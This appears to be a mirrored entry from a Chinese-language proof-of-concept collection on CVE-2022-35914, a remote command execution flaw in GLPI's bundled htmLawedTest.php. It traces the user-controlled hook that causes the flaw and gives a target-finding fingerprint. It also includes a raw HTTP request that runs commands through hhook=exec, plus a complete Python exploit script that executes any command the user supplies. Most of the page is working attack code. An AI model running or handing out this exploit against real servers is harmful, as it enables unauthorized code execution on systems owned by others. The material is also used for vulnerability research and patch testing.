admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

162 lines
5.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# GLPI htmLawedTest.php 远程命令执行漏洞 CVE-2022-35914
## 漏洞描述
GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口你可以用它来建立数据库全面管理IT的电脑显示器服务器打印机网络设备电话甚至硒鼓和墨盒等。GLPI 10.0.2及之前版本存在安全漏洞该漏洞源于htmlawed 模块中的 `/vendor/htmlawed/htmlawed/htmLawedTest.php` 允许 PHP 代码注入。
## 漏洞影响
```
GLPI 10.0.2及之前版本
```
## 网络测绘
```
title="GLPI"
```
## 漏洞复现
登录页面
![image-20221017171204621](images/202210171712679.png)
出现问题的文件为 **htmLawedTest.php** 来源于第三方库 PHP Labware
![image-20221017171224096](images/202210171712160.png)
```
https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
```
在 htmLawedTest.php 中接收参数并传入方法 htmLawed 中
![image-20221017171243880](images/202210171712972.png)
跟进文件 htmLawed.php 中
![image-20221017171259491](images/202210171712583.png)
```
if($C['hook']){$t = $C['hook']($t, $C, $S);}
```
这里可以看到参数均为用户可控参数,当控制参数 hhook 为 exec 和 text 为执行的命令时就导致了命令执行漏洞
![image-20221017171318915](images/202210171713976.png)
验证POC
```
/vendor/htmlawed/htmlawed/htmLawedTest.php
```
![image-20221017171343438](images/202210171713502.png)
![image-20221017171358385](images/202210171713454.png)
访问页面获取到 sid 与 token 后再发送请求包
```
POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
Host:
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 88
Content-Type: application/x-www-form-urlencoded
token=a79cf121bde57fe0e3cc0f247f77961a&text=id&hhook=exec&sid=h1c0vk004dvulal5nj8i6en44e
```
![image-20221017171416286](images/202210171714358.png)
## 漏洞POC
- https://github.com/cosad3s/CVE-2022-35914-poc
```python
#!/usr/bin/python
# -*- coding: utf-8 -*-
import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re
requests.packages.urllib3.disable_warnings()
RED = '\x1b[91m'
BLUE = '\033[94m'
GREEN = '\033[32m'
ENDC = '\033[0m'
banner="""
______ _______ ____ ___ ____ ____ _________ ___ _ _ _
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |
| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|
\____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|
"""
def main():
print(banner)
parser = argparse.ArgumentParser(description='CVE-2022-35914 - GLPI - Command injection using a third-party library script')
parser.add_argument('-u', type=str, required=True, dest='url', help = "URL to test")
parser.add_argument('-c', type=str, required=False, dest='cmd', default = "id", help = "Command to launch (default: id)")
parser.add_argument('-f', type=str, required=False, dest='hook', default = "exec", help = "PHP hook function (default: exec)")
parser.add_argument('--check', action="store_true", dest='check', help = "Just check, no command execution.")
parser.add_argument('--user-agent', type=str, required=False, default="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", dest='user_agent', help = "Custom User-Agent")
args = parser.parse_args()
exploit(args.url, args.cmd, args.user_agent,args.check,args.hook)
def exploit(url,cmd,user_agent,check,hook):
uri = "/vendor/htmlawed/htmlawed/htmLawedTest.php"
headers = {'User-Agent': user_agent}
session = requests.Session()
response_part1 = session.get(str(url)+uri, verify=False, headers=headers)
if (response_part1.status_code != 200):
fail()
soup = BeautifulSoup(response_part1.text, 'html.parser')
if (soup.title.text.find("htmLawed") == -1):
fail()
if (check):
print(GREEN + "[+] Server potentially vulnerable to CVE-2022-35914" + ENDC)
sys.exit()
# Prepare POST request
token_value = soup.find_all(id='token')[0]['value']
sid_value = session.cookies.get("sid")
body = {"token":token_value,"text":cmd,"hhook":hook,"sid":sid_value}
response_part2 = session.post(str(url)+uri, verify=False, headers=headers, data=body)
parse(response_part2.text)
def parse(response):
soup = BeautifulSoup(response, 'html.parser')
raw = soup.find_all(id='settingF')[0]
return_code_search_regex = "\$spec\: (.*)"
found_return_code = re.search(return_code_search_regex, raw.text, re.DOTALL).group(1)
output_search_regex = "\[xml:lang\] \=\> 0\n(.*)\n\)"
found_output = re.search(output_search_regex, raw.text, re.DOTALL)
print(GREEN + "[+] Command output (Return code: " + found_return_code + "):" + ENDC)
if (found_output != None):
raw_output = found_output.group(1)
cleaning_regex = ".*\=\>"
cleaned_output = re.sub (cleaning_regex, "", raw_output)
print(cleaned_output)
def fail():
print(RED + "[-] Server not vulnerable to CVE-2022-35914" + ENDC)
sys.exit()
if __name__ == '__main__':
main()
```
Reference in New Issue View Git Blame Copy Permalink